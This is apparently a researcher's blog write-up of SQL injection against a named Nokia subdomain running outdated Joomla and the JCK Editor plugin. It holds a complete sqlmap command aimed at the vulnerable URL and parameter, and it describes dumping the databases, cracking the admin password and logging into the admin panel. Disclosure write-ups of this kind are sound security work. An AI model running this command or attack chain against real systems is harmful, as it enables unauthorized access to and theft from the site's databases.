DEV Community ๐Ÿ‘ฉโ€๐Ÿ’ป๐Ÿ‘จโ€๐Ÿ’ป

Cover image for SQL inection on gdclive.nokia.com
Khaled Nassar
Khaled Nassar

Posted on • Updated on

SQL inection on gdclive.nokia.com

Hi, this blog about SQL Injection in Nokia.com Allowed me to Dump all database

Full POC :

when I'm visiting this domain gdclive.nokia.com I've found something

First: this domain has been used an old version of Joomla CMS

let's scan it using the joomscan tool for dumping all pieces of information about Joomla (plugins, version, etc..)

All results :

Joomla Version: 3.1
Plugins: JCK Editor (6.4.4)
Enter fullscreen mode Exit fullscreen mode

searching for JCK Editor in exploit-db.com
and I've found this exploit https://www.exploit-db.com/exploits/45423
let's exploit it :D

Worked ..!
you can see the version of the database :D

this is the time of SQLMAP Tool


$ sqlmap -u 'https://gdclive.nokia.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=' --level=5 --risk=3 --random-agent --technique=U -p parent --batch --current-db --current-user
Enter fullscreen mode Exit fullscreen mode

you can see the current user and the name of the database :)
After dumping all databases using the --all option and unencrypt the password of the admin account let's login in admin panel


PWNED :D

You can see this video about this bug

Thanks ;0

Top comments (1)

Collapse
 
swindlesmccoop profile image
Swindles McCoop

Thanks for sharing, this is pretty cool

Now it's your turn.

๐Ÿ—’ Share a tutorial
๐Ÿค” Reflect on your coding journey
โ“ Ask a question

Create an account to join hundreds of thousands of DEV members on their journey.